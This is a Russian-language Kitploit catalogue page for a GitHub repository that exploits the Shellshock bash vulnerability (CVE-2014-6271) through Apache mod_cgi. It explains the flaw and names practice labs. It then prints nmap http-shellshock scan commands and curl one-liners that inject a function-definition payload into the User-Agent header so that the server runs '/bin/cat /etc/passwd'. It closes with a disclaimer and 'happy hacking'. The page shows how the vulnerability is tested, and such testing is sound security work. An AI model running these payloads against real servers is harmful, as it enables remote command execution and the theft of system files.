Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/j0hnth3kn1ght/cve-2014-6271
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubj0hnth3kn1ght/cve-2014-6271

CVE-2014-6271

Эксплуатация уязвимости «Shellshock». Удаленное выполнение кода в Apache с mod_cgi

Репозиторий
51 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплуатация уязвимости Shellshock (CVE-2014-6271)

Shellshock — это уязвимость удалённого выполнения команд в BASH. Данный скрипт эксплуатирует уязвимость в веб-среде Apache или аналогичных серверов с включённым mod_cgi. Уязвимость заключается в манипуляции переменными окружения — динамическими именованными значениями, которые влияют на выполнение процессов на компьютере. Атакующие могут воспользоваться этим, прикрепляя вредоносный код к переменным окружения, который выполняется при получении переменной. Это позволяет атакующим потенциально скомпрометировать систему.

Лаборатория для тестирования уязвимости

  • PentesterLab

  • VulnHub

  • TryHackMe

    Видео2

Поиск страниц CGI-BIN:

root@kitploit:~
$ nmap 192.168.x.x --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
$ nmap -sV -p- --script http-shellshock 192.168.x.x
$ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x

Ручная проверка:

root@kitploit:~
sudo curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" <WEBSERVER-IP>
sudo curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/cat /etc/passwd;" <WEBSERVER-IP>

Предупреждение:

Я не несу ответственности за любое незаконное использование или ущерб, причинённый этим инструментом. Он был написан ради развлечения, а не ради зла, и предназначен для повышения осведомлённости о хакинге и кибербезопасности

Удачного хакерства :)

Скачать инструмент